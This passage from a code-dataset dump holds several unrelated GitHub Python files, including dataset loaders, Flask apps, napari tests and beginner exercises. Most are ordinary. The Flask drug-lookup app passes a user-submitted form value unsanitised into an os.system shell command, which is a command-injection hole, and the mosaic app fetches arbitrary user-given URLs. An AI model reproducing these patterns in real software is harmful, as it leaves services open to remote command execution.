print('Sequência de Fibonnaci')\n print(chatbot.sequencia_fibonacci())\n elif opcao == 2:\n dia = int(input('Informe seu dia de nascimento: '))\n mes = input('Informe o seu mês de nascimento: ')\n chatbot.descubra_seu_signo(dia, mes)\n elif opcao == 3:\n print(f'Olá me chamo {chatbot.get_nome_chatbot()}')\n elif opcao == 4:\n chatbot.piada()\n elif opcao == 5:\n chatbot.charada()\n else:\n print('Valor Inválido!')\nif __name__ == \"__main__\":\n main()\n","repo_name":"diegolisboadev/Exercicios_com_Python3","sub_path":"ExerciciosPythonCursosExtras/main_chatbot.py","file_name":"main_chatbot.py","file_ext":"py","file_size_in_byte":3193,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"21299813094","text":"import random\n\nimport cv2\nimport h5py\nimport numpy as np\nimport torch\nfrom torch.utils.data import Dataset\nfrom torchvision import transforms\nfrom transformers import CLIPTokenizer\n\n# from models.blip_override.blip import init_tokenizer\n\n\nimport torch\nfrom PIL import Image\nimport pandas as pd\n\nclass ImageDataset(Dataset):\n def __init__(self, subset, args):\n super(ImageDataset, self).__init__()\n\n self.args = args\n self.csv_file = args.get(args.dataset).csv_file\n\n self.data = pd.read_csv(self.csv_file)\n self.data = (self.data[:int(self.data.shape[0]*0.8)] if subset==\"train\" else self.data[int(self.data.shape[0]*0.8):int(self.data.shape[0]*0.9)] if subset==\"val\" else self.data[int(self.data.shape[0]*0.9):]).reset_index()\n self.image_paths = \"/\".join(self.csv_file.split(\"/\")[:-1]) + \"/\" + self.data['image_path']\n self.captions = self.data['caption']\n \n self.augment = transforms.Compose([\n # transforms.ToPILImage(),\n transforms.Resize([512, 512]),\n transforms.ToTensor(),\n transforms.Normalize([0.5], [0.5])\n ])\n \n self.subset = subset\n self.dataset = args.dataset\n\n self.max_length = args.get(args.dataset).max_length\n\n self.clip_tokenizer = CLIPTokenizer.from_pretrained('runwayml/stable-diffusion-v1-5', subfolder=\"tokenizer\")\n msg = self.clip_tokenizer.add_tokens(list(args.get(args.dataset).new_tokens))\n print(\"clip {} new tokens added\".format(msg))\n \n def __len__(self):\n return len(self.data)\n \n def __getitem__(self, index):\n image_path = self.image_paths[index]\n caption = self.captions[index]\n \n # Load image\n image = Image.open(image_path)\n image = self.augment(image) if self.subset in ['train', 'val'] else torch.from_numpy(np.array(image))\n \n \n text = self.data['caption'][index]\n\n # tokenize caption using default tokenizer\n tokenized = self.clip_tokenizer(\n text,\n padding=\"max_length\",\n max_length=self.max_length,\n truncation=False,\n return_tensors=\"pt\",\n )\n caption, attention_mask = tokenized['input_ids'], tokenized['attention_mask']\n\n return image, caption, attention_mask\n\nclass StoryDataset(Dataset):\n \"\"\"\n A custom subset class for the LRW (includes train, val, test) subset\n \"\"\"\n\n def __init__(self, subset, args):\n super(StoryDataset, self).__init__()\n self.args = args\n\n self.h5_file = args.get(args.dataset).hdf5_file\n self.subset = subset\n\n self.augment = transforms.Compose([\n transforms.ToPILImage(),\n transforms.Resize([512, 512]),\n transforms.ToTensor(),\n transforms.Normalize([0.5], [0.5])\n ])\n self.dataset = args.dataset\n self.max_length = args.get(args.dataset).max_length\n self.clip_tokenizer = CLIPTokenizer.from_pretrained('runwayml/stable-diffusion-v1-5', subfolder=\"tokenizer\")\n self.blip_tokenizer = init_tokenizer()\n msg = self.clip_tokenizer.add_tokens(list(args.get(args.dataset).new_tokens))\n print(\"clip {} new tokens added\".format(msg))\n msg = self.blip_tokenizer.add_tokens(list(args.get(args.dataset).new_tokens))\n print(\"blip {} new tokens added\".format(msg))\n\n self.blip_image_processor = transforms.Compose([\n transforms.ToPILImage(),\n transforms.Resize([224, 224]),\n transforms.ToTensor(),# scales to 0,1\n transforms.Normalize([0.48145466, 0.4578275, 0.40821073], [0.26862954, 0.26130258, 0.27577711]) ## (pixel[r,g,b]-mean)/std\n ])\n\n def open_h5(self):\n h5 = h5py.File(self.h5_file, \"r\")\n self.h5 = h5[self.subset]\n\n def __getitem__(self, index):\n if not hasattr(self, 'h5'):\n self.open_h5()\n\n images = list()\n for i in range(5):\n im = self.h5['image{}'.format(i)][index]\n im = cv2.imdecode(im, cv2.IMREAD_COLOR)\n idx = random.randint(0, 4)\n images.append(im[idx * 128: (idx + 1) * 128])#selects a random portion of the image vertically with a height of 128 pixels\n\n source_images = torch.stack([self.blip_image_processor(im) for im in images])\n images = images[1:] if self.args.task == 'continuation' else images\n images = torch.stack([self.augment(im) for im in images]) \\\n if self.subset in ['train', 'val'] else torch.from_numpy(np.array(images))\n\n texts = self.h5['text'][index].decode('utf-8').split('|')\n\n # tokenize caption using default tokenizer\n tokenized = self.clip_tokenizer(\n texts[1:] if self.args.task == 'continuation' else texts,\n padding=\"max_length\",\n max_length=self.max_length,\n truncation=False,\n return_tensors=\"pt\",\n )\n captions, attention_mask = tokenized['input_ids'], tokenized['attention_mask']\n\n tokenized = self.blip_tokenizer(\n texts,\n padding=\"max_length\",\n max_length=self.max_length,\n truncation=False,\n return_tensors=\"pt\",\n )\n source_caption, source_attention_mask = tokenized['input_ids'], tokenized['attention_mask']\n return images, captions, attention_mask, source_images, source_caption, source_attention_mask\n\n def __len__(self):\n if not hasattr(self, 'h5'):\n self.open_h5()\n return len(self.h5['text'])\n\n\n# if __name__==\"__main__\":\n# from torch.utils.data import DataLoader\n# # Define your arguments\n# class Args:\n# dataset = 'flintstones'\n# flintstones = {\n# \"csv_file\" : '/home/nlab/abouelaecha/finetune_stable_diffusion/data/data.csv',\n# \"max_length\" : 91,\n# \"new_tokens\" : [ \"fred\", \"barney\", \"wilma\", \"betty\", \"pebbles\", \"dino\", \"slate\" ],\n# }\n# def get(self, _dataset):\n# return getattr(self, _dataset)\n\n# args = Args()\n\n# # Create an instance of the ImageDataset\n# dataset = ImageDataset(subset='train', args=args)\n\n# # Example usage\n# index = 0\n# image, caption, attention_mask = dataset[index]\n\n# # Print the shapes\n# print(\"Image shape:\", image.shape)\n# print(\"Caption shape:\", caption.shape)\n# print(\"Attention mask shape:\", attention_mask.shape)\n\n# # Create a data loader\n# batch_size = 16\n# dataloader = DataLoader(dataset, batch_size=batch_size, shuffle=True)\n\n# # Iterate over the data loader\n# for images, captions, attention_masks in dataloader:\n# # Perform operations on the batched data\n# # For example, pass the images and captions through your model\n# # ...\n# # ...\n# # Perform any necessary calculations or computations\n# # ...\n\n# # Print the shapes of the batched data\n# print(\"Batched images shape:\", images.shape)\n# print(\"Batched captions shape:\", captions.shape)\n# print(\"Batched attention masks shape:\", attention_masks.shape)\n","repo_name":"othmane-ab/LM-LDM","sub_path":"datasets/flintstones.py","file_name":"flintstones.py","file_ext":"py","file_size_in_byte":7192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"42504106622","text":"# -*- coding: utf-8 -*-\r\n# @Time : 2019/1/19 20:49 \r\n# @Author : for \r\n# @File : 02_classmethod_test.py \r\n# @Software: PyCharm\r\n# class People(object):\r\n# #类属性\r\n# country = 'china'\r\n# @classmethod#类方法\r\n# def getCountry(cls):\r\n# return cls.country\r\n# @classmethod\r\n# def setCountry(cls,country):\r\n# cls.country = country\r\n# p = People()\r\n# print(p.getCountry())\r\n# print(People.getCountry())\r\n# p.setCountry('japan')\r\n# print(p.getCountry())\r\n# print(People.getCountry())\r\n#staticmethod\r\nclass People(object):\r\n #类属性\r\n country = 'china'\r\n #静态方法 没有cls 进性承载类对象 所以知己而通过 类对象进行访问\r\n @staticmethod\r\n def __getCountry():\r\n print(People.country)\r\n def test(self):\r\n People.__getCountry()\r\nPeople.__getCountry()\r\nP = People()\r\n# P.getCountry()\r\nP.test()\r\n\r\n\r\n","repo_name":"xuegod6/xuegod_code","sub_path":"1_10_面向对象的三大方法/02_classmethod_test.py","file_name":"02_classmethod_test.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"28804321219","text":"from flask import Flask, request, render_template, redirect, Markup, send_from_directory, send_file\nfrom PIL import Image\nimport urllib.request\nimport random\napp = Flask(__name__)\n\n# Układ zdjęć przy danej ilości zdjęć: (ilość w pierwszym rzędzi, drugim,trzecim)\nuklad = [(1,0,0),(2,0,0),(2,1,0),(2,2,0),(3,2,0),(3,3,0),(2,3,2),(3,2,3)]\n\n'''\nGłówny formularz wyboru\n'''\n@app.route(\"/\", methods=[\"GET\",\"POST\"])\ndef index():\n if request.method == \"POST\":\n try:\n los = request.form[\"los\"]\n los = 1\n except KeyError:\n los = 0\n resX = request.form[\"resX\"]\n resY = request.form[\"resY\"]\n zdjecia = []\n flaga = False\n for i in range(1,9):\n if request.form[\"url\"+str(i)]:\n if flaga:\n zdjecia.append(\",\")\n zdjecia.append(request.form[\"url\"+str(i)])\n flaga = True\n if not resY: \n resY=\"2048\"\n if not resX:\n resX=\"2048\"\n return redirect(\"mozaika?losowo=\"+str(los)+\"&rozdzielczosc=\"+resX+\"x\"+resY+\"&zdjecia=\"+\"\".join(zdjecia))\n return render_template(\"index.html\")\n\n'''\nFunkcja mieszająca kolejność zdjęć\n'''\ndef shuffle(zdjecia):\n for i in range(len(zdjecia)):\n rand = random.randrange(len(zdjecia))\n zdjecia[i], zdjecia[rand] = zdjecia[rand], zdjecia[i]\n\n\n'''\nfunkcja tworząca mozikę\n'''\ndef create_image(losowo, x, y, zdjecia):\n n = int((len(zdjecia) + 1) / 2)\n\n if losowo:\n shuffle(zdjecia)\n\n new_img = Image.new(\"RGB\", (x, y), color=(255,255,255))\n x_off = 0\n y_off = 0\n max_y_off = 0\n j = 0 #kolumna\n k = 0 #rząd\n n_y = 3 - uklad[len(zdjecia)-1].count(0)\n for i in zdjecia:\n if j == uklad[len(zdjecia)-1][k]:\n if k == 0:\n y_off = 0\n j = 0\n k += 1\n y_off += int(y / n_y)\n x_off = 0\n if k == 2:\n y_off = max_y_off\n scale(x,y,i,uklad[len(zdjecia)-1][k],n_y)\n if k == 0:\n y_off = int(axis(y,n_y,i.size[1]))\n if k == 1:\n if max_y_off < y_off + i.size[1]:\n max_y_off = y_off + i.size[1]\n new_img.paste(i, (x_off, y_off))\n x_off += i.size[0]\n j += 1\n new_img.save(\"img/s.jpg\")\n\n\n'''\nFunkcja zwracająca odległość zdjęcia do osi\n'''\ndef axis(height, n_y, h):\n return ((height / n_y) - h)\n\n\n'''\nSkalowanie zdjęć\n'''\ndef scale(width, height, img, n_x, n_y):\n if n_x > 0 and n_y > 0:\n img.thumbnail((width/n_x,height/n_y))\n elif n_x > 0:\n img.thumbnail((width/n_x,height))\n elif n_y > 0:\n img.thumbnail((width,height/n_y))\n else:\n img.thumbnail((width,height))\n\n\n\n'''\nWyświetlanie mozaiki\n'''\n@app.route(\"/mozaika\", methods=[\"GET\"])\ndef mozaika():\n losowo = request.args.get(\"losowo\", 0)\n rozdzielczosc = request.args.get(\"rozdzielczosc\",\"2048x2048\")\n zdjecia = request.args.get(\"zdjecia\")\n (rozdzielczoscX, rozdzielczoscY) = rozdzielczosc.split(\"x\")\n rozdzielczoscX = int(rozdzielczoscX)\n rozdzielczoscY = int(rozdzielczoscY)\n zdjecia = zdjecia.split(\",\")\n losowo = int(losowo)\n\n urls = list(map(urllib.request.urlopen,zdjecia))\n images = list(map(Image.open,urls))\n \n create_image(losowo, rozdzielczoscX, rozdzielczoscY, images)\n\n return send_file(\"img/s.jpg\")\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"ksychla/mosaic","sub_path":"zadanie.py","file_name":"zadanie.py","file_ext":"py","file_size_in_byte":3457,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"34835893097","text":"from datetime import date\n\nfrom django.db import connection\n\nfrom leases.utils import calculate_winter_season_start_date\n\n\ndef get_next_sticker_number(lease_start: date) -> int:\n with connection.cursor() as cursor:\n sticker_season = get_ws_sticker_season(lease_start)\n sequence_name = \"ws_stickers_\" + sticker_season\n\n cursor.execute(\"SELECT nextval(%s)\", [sequence_name])\n return cursor.fetchone()[0]\n\n\ndef get_ws_sticker_season(lease_start: date) -> str:\n start_date = calculate_winter_season_start_date(lease_start)\n start_year = start_date.year\n end_year = start_year + 1\n return \"{}_{}\".format(start_year, end_year)\n\n\ndef create_ws_sticker_sequences() -> None:\n \"\"\"Creates WS sticker sequences for next 25 years\"\"\"\n with connection.cursor() as cursor:\n start_year = 2020\n for i in range(25):\n year = start_year + i\n sql = \"CREATE SEQUENCE IF NOT EXISTS ws_stickers_{}_{} START 1;\".format(\n year, year + 1\n )\n cursor.execute(sql)\n","repo_name":"City-of-Helsinki/berth-reservations","sub_path":"leases/stickers.py","file_name":"stickers.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"19"} +{"seq_id":"12940616668","text":"import sys\nimport scrapy\nimport json\nimport os\nfrom subprocess import run\n\n\nfrom flask import *\napp = Flask(__name__)\n\n\n@app.route(\"/home\", methods=[\"GET\", \"POST\"])\ndef home():\n if request.method == \"POST\":\n global user_drug_name\n user_drug_name = request.form[\"Drug_name\"]\n return redirect('/result')\n return render_template(\"home.html\")\n\n\n@app.route('/result',methods = ['POST', 'GET'])\ndef result():\n if request.method == \"POST\":\n user_drug_name = request.form[\"Drug_name\"]\n drug_name=user_drug_name\n str1=\"https://go.drugbank.com/unearth/q?searcher=drugs&query=\"+drug_name \n command=f'scrapy crawl drug -a start_urls=\"{str1}\" --nolog'\n curr_dir =os.getcwd()\n os.chdir(\"./tutorial/tutorial/\")\n os.system(command)\n with open('C://Users//U6071514//OneDrive - Clarivate Analytics//Desktop//drug_api_flask_db//tutorial//tutorial//db.json','r') as openfile:\n json_object=json.load(openfile)\n output = json_object\n print(\"\\n\\n data--\", output)\n os.chdir(curr_dir)\n return jsonify(output)\n\nif __name__ == \"__main__\":\n app.run(host='127.0.0.1', port=105)","repo_name":"namanscoding/Medimind","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"73039945642","text":"import os\nfrom unittest import mock\n\nimport numpy as np\nimport pytest\nfrom qtpy.QtWidgets import QMessageBox\n\nfrom napari._tests.utils import (\n add_layer_by_type,\n check_viewer_functioning,\n layer_test_data,\n)\nfrom napari.utils.io import imread\n\n\ndef test_qt_viewer(make_napari_viewer):\n \"\"\"Test instantiating viewer.\"\"\"\n viewer = make_napari_viewer()\n view = viewer.window.qt_viewer\n\n assert viewer.title == 'napari'\n assert view.viewer == viewer\n # Check no console is present before it is requested\n assert view._console is None\n\n assert len(viewer.layers) == 0\n assert view.layers.vbox_layout.count() == 2\n\n assert viewer.dims.ndim == 2\n assert view.dims.nsliders == viewer.dims.ndim\n assert np.sum(view.dims._displayed_sliders) == 0\n\n\ndef test_qt_viewer_with_console(make_napari_viewer):\n \"\"\"Test instantiating console from viewer.\"\"\"\n viewer = make_napari_viewer()\n view = viewer.window.qt_viewer\n # Check no console is present before it is requested\n assert view._console is None\n # Check console is created when requested\n assert view.console is not None\n assert view.dockConsole.widget() is view.console\n\n\ndef test_qt_viewer_toggle_console(make_napari_viewer):\n \"\"\"Test instantiating console from viewer.\"\"\"\n viewer = make_napari_viewer()\n view = viewer.window.qt_viewer\n # Check no console is present before it is requested\n assert view._console is None\n # Check console has been created when it is supposed to be shown\n view.toggle_console_visibility(None)\n assert view._console is not None\n assert view.dockConsole.widget() is view.console\n\n\n@pytest.mark.parametrize('layer_class, data, ndim', layer_test_data)\ndef test_add_layer(make_napari_viewer, layer_class, data, ndim):\n viewer = make_napari_viewer(ndisplay=int(np.clip(ndim, 2, 3)))\n view = viewer.window.qt_viewer\n\n add_layer_by_type(viewer, layer_class, data)\n check_viewer_functioning(viewer, view, data, ndim)\n\n\ndef test_new_labels(make_napari_viewer):\n \"\"\"Test adding new labels layer.\"\"\"\n # Add labels to empty viewer\n viewer = make_napari_viewer()\n view = viewer.window.qt_viewer\n\n viewer._new_labels()\n assert np.max(viewer.layers[0].data) == 0\n assert len(viewer.layers) == 1\n assert view.layers.vbox_layout.count() == 2 * len(viewer.layers) + 2\n\n assert viewer.dims.ndim == 2\n assert view.dims.nsliders == viewer.dims.ndim\n assert np.sum(view.dims._displayed_sliders) == 0\n\n # Add labels with image already present\n viewer = make_napari_viewer()\n view = viewer.window.qt_viewer\n\n np.random.seed(0)\n data = np.random.random((10, 15))\n viewer.add_image(data)\n viewer._new_labels()\n assert np.max(viewer.layers[1].data) == 0\n assert len(viewer.layers) == 2\n assert view.layers.vbox_layout.count() == 2 * len(viewer.layers) + 2\n\n assert viewer.dims.ndim == 2\n assert view.dims.nsliders == viewer.dims.ndim\n assert np.sum(view.dims._displayed_sliders) == 0\n\n\ndef test_new_points(make_napari_viewer):\n \"\"\"Test adding new points layer.\"\"\"\n # Add labels to empty viewer\n viewer = make_napari_viewer()\n view = viewer.window.qt_viewer\n\n viewer.add_points()\n assert len(viewer.layers[0].data) == 0\n assert len(viewer.layers) == 1\n assert view.layers.vbox_layout.count() == 2 * len(viewer.layers) + 2\n\n assert viewer.dims.ndim == 2\n assert view.dims.nsliders == viewer.dims.ndim\n assert np.sum(view.dims._displayed_sliders) == 0\n\n # Add points with image already present\n viewer = make_napari_viewer()\n view = viewer.window.qt_viewer\n\n np.random.seed(0)\n data = np.random.random((10, 15))\n viewer.add_image(data)\n viewer.add_points()\n assert len(viewer.layers[1].data) == 0\n assert len(viewer.layers) == 2\n assert view.layers.vbox_layout.count() == 2 * len(viewer.layers) + 2\n\n assert viewer.dims.ndim == 2\n assert view.dims.nsliders == viewer.dims.ndim\n assert np.sum(view.dims._displayed_sliders) == 0\n\n\ndef test_new_shapes_empty_viewer(make_napari_viewer):\n \"\"\"Test adding new shapes layer.\"\"\"\n # Add labels to empty viewer\n viewer = make_napari_viewer()\n view = viewer.window.qt_viewer\n\n viewer.add_shapes()\n assert len(viewer.layers[0].data) == 0\n assert len(viewer.layers) == 1\n assert view.layers.vbox_layout.count() == 2 * len(viewer.layers) + 2\n\n assert viewer.dims.ndim == 2\n assert view.dims.nsliders == viewer.dims.ndim\n assert np.sum(view.dims._displayed_sliders) == 0\n\n # Add points with image already present\n viewer = make_napari_viewer()\n view = viewer.window.qt_viewer\n\n np.random.seed(0)\n data = np.random.random((10, 15))\n viewer.add_image(data)\n viewer.add_shapes()\n assert len(viewer.layers[1].data) == 0\n assert len(viewer.layers) == 2\n assert view.layers.vbox_layout.count() == 2 * len(viewer.layers) + 2\n\n assert viewer.dims.ndim == 2\n assert view.dims.nsliders == viewer.dims.ndim\n assert np.sum(view.dims._displayed_sliders) == 0\n\n\ndef test_z_order_adding_removing_images(make_napari_viewer):\n \"\"\"Test z order is correct after adding/ removing images.\"\"\"\n data = np.ones((10, 10))\n\n viewer = make_napari_viewer()\n vis = viewer.window.qt_viewer.layer_to_visual\n viewer.add_image(data, colormap='red', name='red')\n viewer.add_image(data, colormap='green', name='green')\n viewer.add_image(data, colormap='blue', name='blue')\n order = [vis[x].order for x in viewer.layers]\n np.testing.assert_almost_equal(order, list(range(len(viewer.layers))))\n\n # Remove and re-add image\n viewer.layers.remove('red')\n order = [vis[x].order for x in viewer.layers]\n np.testing.assert_almost_equal(order, list(range(len(viewer.layers))))\n viewer.add_image(data, colormap='red', name='red')\n order = [vis[x].order for x in viewer.layers]\n np.testing.assert_almost_equal(order, list(range(len(viewer.layers))))\n\n # Remove two other images\n viewer.layers.remove('green')\n viewer.layers.remove('blue')\n order = [vis[x].order for x in viewer.layers]\n np.testing.assert_almost_equal(order, list(range(len(viewer.layers))))\n\n # Add two other layers back\n viewer.add_image(data, colormap='green', name='green')\n viewer.add_image(data, colormap='blue', name='blue')\n order = [vis[x].order for x in viewer.layers]\n np.testing.assert_almost_equal(order, list(range(len(viewer.layers))))\n\n\ndef test_screenshot(make_napari_viewer):\n \"Test taking a screenshot\"\n viewer = make_napari_viewer()\n\n np.random.seed(0)\n # Add image\n data = np.random.random((10, 15))\n viewer.add_image(data)\n\n # Add labels\n data = np.random.randint(20, size=(10, 15))\n viewer.add_labels(data)\n\n # Add points\n data = 20 * np.random.random((10, 2))\n viewer.add_points(data)\n\n # Add vectors\n data = 20 * np.random.random((10, 2, 2))\n viewer.add_vectors(data)\n\n # Add shapes\n data = 20 * np.random.random((10, 4, 2))\n viewer.add_shapes(data)\n\n # Take screenshot\n screenshot = viewer.window.qt_viewer.screenshot()\n assert screenshot.ndim == 3\n\n\n@pytest.mark.skip(\"new approach\")\ndef test_screenshot_dialog(make_napari_viewer, tmpdir):\n \"\"\"Test save screenshot functionality.\"\"\"\n viewer = make_napari_viewer()\n\n np.random.seed(0)\n # Add image\n data = np.random.random((10, 15))\n viewer.add_image(data)\n\n # Add labels\n data = np.random.randint(20, size=(10, 15))\n viewer.add_labels(data)\n\n # Add points\n data = 20 * np.random.random((10, 2))\n viewer.add_points(data)\n\n # Add vectors\n data = 20 * np.random.random((10, 2, 2))\n viewer.add_vectors(data)\n\n # Add shapes\n data = 20 * np.random.random((10, 4, 2))\n viewer.add_shapes(data)\n\n # Save screenshot\n input_filepath = os.path.join(tmpdir, 'test-save-screenshot')\n mock_return = (input_filepath, '')\n with mock.patch('napari._qt.qt_viewer.QFileDialog') as mocker, mock.patch(\n 'napari._qt.qt_viewer.QMessageBox'\n ) as mocker2:\n mocker.getSaveFileName.return_value = mock_return\n mocker2.warning.return_value = QMessageBox.Yes\n viewer.window.qt_viewer._screenshot_dialog()\n # Assert behaviour is correct\n expected_filepath = input_filepath + '.png' # add default file extension\n assert os.path.exists(expected_filepath)\n output_data = imread(expected_filepath)\n expected_data = viewer.window.qt_viewer.screenshot()\n assert np.allclose(output_data, expected_data)\n\n\n@pytest.mark.parametrize(\n \"dtype\", ['int8', 'uint8', 'int16', 'uint16', 'float32']\n)\ndef test_qt_viewer_data_integrity(make_napari_viewer, dtype):\n \"\"\"Test that the viewer doesn't change the underlying array.\"\"\"\n\n image = np.random.rand(10, 32, 32)\n image *= 200 if dtype.endswith('8') else 2 ** 14\n image = image.astype(dtype)\n imean = image.mean()\n\n viewer = make_napari_viewer()\n\n viewer.add_image(image.copy())\n datamean = viewer.layers[0].data.mean()\n assert datamean == imean\n # toggle dimensions\n viewer.dims.ndisplay = 3\n datamean = viewer.layers[0].data.mean()\n assert datamean == imean\n # back to 2D\n viewer.dims.ndisplay = 2\n datamean = viewer.layers[0].data.mean()\n assert datamean == imean\n\n\ndef test_points_layer_display_correct_slice_on_scale(make_napari_viewer):\n viewer = make_napari_viewer()\n data = np.zeros((60, 60, 60))\n viewer.add_image(data, scale=[0.29, 0.26, 0.26])\n pts = viewer.add_points(name='test', size=1, ndim=3)\n pts.add((8.7, 0, 0))\n viewer.dims.set_point(0, 30 * 0.29) # middle plane\n layer = viewer.layers[1]\n indices, scale = layer._slice_data(layer._slice_indices)\n np.testing.assert_equal(indices, [0])\n","repo_name":"zzalscv2/napari","sub_path":"napari/_qt/_tests/test_qt_viewer.py","file_name":"test_qt_viewer.py","file_ext":"py","file_size_in_byte":9751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"36549062640","text":"import unittest\n\nclass Solution:\n def isValidSudoku2(self, board):\n \"\"\"\n :type board: List[List[str]]\n :rtype: bool\n \"\"\"\n empty = \".\"\n\n rows = [set() for _ in range(len(board))]\n columns = [set() for _ in range(len(board[0]))]\n sub_boxes = [\n set() for _ in range(len(board)) for _ in range(len(board[0]))\n ]\n\n for x in range(len(board)):\n for y in range(len(board[0])):\n if board[x][y] == empty:\n continue\n\n if board[x][y] in rows[x]:\n print(1)\n print(rows)\n print(x)\n print(y)\n print(board[x][y])\n return False\n else:\n rows[x].add(board[x][y])\n\n if board[x][y] in columns[y]:\n print(2)\n return False\n else:\n columns[y].add(board[x][y])\n\n box_num = x // 3 * len(board[0]) // 3 + y // 3\n if board[x][y] in sub_boxes[box_num]:\n print(3)\n return False\n else:\n sub_boxes[box_num].add(board[x][y])\n\n return True\n\n def isValidSudoku(self, board):\n \"\"\"\n :type board: List[List[str]]\n :rtype: bool\n \"\"\"\n empty = \".\"\n\n rows = {k: set() for k in range(len(board))}\n columns = {k: set() for k in range(len(board[0]))}\n sub_boxes = {(x, y): set() for x in range(0, 3) for y in range(0, 3)}\n\n for x in range(len(board)):\n for y in range(len(board[0])):\n if board[x][y] == empty:\n continue\n\n if board[x][y] in rows[x]:\n return False\n else:\n rows[x].add(board[x][y])\n\n if board[x][y] in columns[y]:\n return False\n else:\n columns[y].add(board[x][y])\n\n if board[x][y] in sub_boxes[(x // 3, y // 3)]:\n return False\n else:\n sub_boxes[(x // 3, y // 3)].add(board[x][y])\n\n return True\n\n def isValidSudoku3it(self, board):\n \"\"\"\n :type board: List[List[str]]\n :rtype: bool\n \"\"\"\n empty = \".\"\n\n # Check 1st rule\n for x in range(len(board)):\n row = set()\n for y in range(len(board[0])):\n if board[x][y] == empty:\n continue\n if board[x][y] in row:\n return False\n else:\n row.add(board[x][y])\n\n # Check 2nd rule\n for y in range(len(board[0])):\n column = set()\n for x in range(len(board)):\n if board[x][y] == empty:\n continue\n if board[x][y] in column:\n return False\n else:\n column.add(board[x][y])\n\n # Check 3rd rule\n sub_boxes = 3\n sub_box_step_x = int(len(board) / sub_boxes)\n sub_box_step_y = int(len(board) / sub_boxes)\n for sub_x in range(0, len(board), sub_box_step_x):\n for sub_y in range(0, len(board[0]), sub_box_step_y):\n sub_box = set()\n for x in range(sub_x, sub_x + sub_box_step_x):\n for y in range(sub_y, sub_y + sub_box_step_y):\n if board[x][y] == empty:\n continue\n if board[x][y] in sub_box:\n return False\n else:\n sub_box.add(board[x][y])\n\n return True\n\n\nclass Tests(unittest.TestCase):\n def setUp(self):\n self.sol = Solution()\n\n def tests(self):\n self.assertTrue(self.sol.isValidSudoku([[\".\"] * 9] * 9))\n self.assertTrue(\n self.sol.isValidSudoku(\n [\n [\"5\", \"3\", \".\", \".\", \"7\", \".\", \".\", \".\", \".\"],\n [\"6\", \".\", \".\", \"1\", \"9\", \"5\", \".\", \".\", \".\"],\n [\".\", \"9\", \"8\", \".\", \".\", \".\", \".\", \"6\", \".\"],\n [\"8\", \".\", \".\", \".\", \"6\", \".\", \".\", \".\", \"3\"],\n [\"4\", \".\", \".\", \"8\", \".\", \"3\", \".\", \".\", \"1\"],\n [\"7\", \".\", \".\", \".\", \"2\", \".\", \".\", \".\", \"6\"],\n [\".\", \"6\", \".\", \".\", \".\", \".\", \"2\", \"8\", \".\"],\n [\".\", \".\", \".\", \"4\", \"1\", \"9\", \".\", \".\", \"5\"],\n [\".\", \".\", \".\", \".\", \"8\", \".\", \".\", \"7\", \"9\"],\n ]\n )\n )\n self.assertFalse(\n self.sol.isValidSudoku(\n [\n [\"8\", \"3\", \".\", \".\", \"7\", \".\", \".\", \".\", \".\"],\n [\"6\", \".\", \".\", \"1\", \"9\", \"5\", \".\", \".\", \".\"],\n [\".\", \"9\", \"8\", \".\", \".\", \".\", \".\", \"6\", \".\"],\n [\"8\", \".\", \".\", \".\", \"6\", \".\", \".\", \".\", \"3\"],\n [\"4\", \".\", \".\", \"8\", \".\", \"3\", \".\", \".\", \"1\"],\n [\"7\", \".\", \".\", \".\", \"2\", \".\", \".\", \".\", \"6\"],\n [\".\", \"6\", \".\", \".\", \".\", \".\", \"2\", \"8\", \".\"],\n [\".\", \".\", \".\", \"4\", \"1\", \"9\", \".\", \".\", \"5\"],\n [\".\", \".\", \".\", \".\", \"8\", \".\", \".\", \"7\", \"9\"],\n ]\n )\n )\n\n\nunittest.main()\n","repo_name":"fspv/learning","sub_path":"l33tcode/valid-sudoku.py","file_name":"valid-sudoku.py","file_ext":"py","file_size_in_byte":5456,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"19"} +{"seq_id":"37569815507","text":"# Zachary Hoover || 9-20-23 || Guided Practice #14\n\ndef print_header(title):\n \"\"\"Prints header with title.\"\"\"\n print(\"\\n ------+ \" + title + \" +------\\n\")\n return\n\n# imports\nimport random\nimport os\n\n# Code to clear the screen before running\nclear = lambda: os.system('clear' if os.name == 'posix' else 'cls')\nclear()\n\nprint_header(\"Choice Introduction\")\n\nfruits = ['apple', 'bannana', 'orange', 'mango', 'kiwi']\nrandom_fruit = random.choice(fruits)\nprint(\" The randomly selected fruit is:\", random_fruit)\n\ninput(\"\\n Press Enter to Continue...\")\nprint_header(\"choice() - Example 1\")\n\nwwe_wrestlers = ['John Cena', 'The Rock', 'Stone Cold Steve Austin', 'Triple H', 'Undertaker']\nrandom_wwe_wrestler = random.choice(wwe_wrestlers)\nprint(f\" The randomly selected WWE wrestler is: {random_wwe_wrestler}\")\n\n\ninput(\"\\n Press Enter to Continue...\")\nprint_header(\"choice() - Example 2\")\n\naew_wrestlers = ['Chris Jericho', 'Jon Moxley', 'Darby Allin', 'Kenny Omega', 'Sting']\nrandom_aew_wrestler = random.choice(aew_wrestlers)\nprint(f\" The randomly selected AEW wrestler is: {random_aew_wrestler}\")\n\ninput(\"\\n Press Enter to Continue...\")\nprint_header(\"choice() - Example 3\")\n\nwwe_wrestlers = ['Austin Theory', 'Brock Lesnar', 'Johny Gargano', 'Thomaso Ciampa', 'Roman Reigns']\nrand_wwe1 = random.choice(wwe_wrestlers)\nrand_wwe2 = random.choice(wwe_wrestlers)\n\nwhile rand_wwe1 == rand_wwe2:\n rand_wwe2 = random.choice(wwe_wrestlers)\n \nprint(f' The randomly selected WWE match between {rand_wwe1} and {rand_wwe2}')\n\ninput(\"\\n Press Enter to 